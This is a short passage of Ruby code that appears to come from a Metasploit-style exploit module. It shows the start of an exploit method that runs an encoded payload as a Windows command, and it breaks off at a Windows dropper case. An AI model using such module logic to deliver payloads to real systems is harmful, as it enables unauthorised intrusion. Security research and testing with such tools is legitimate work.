def exploit
    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :windows_dropper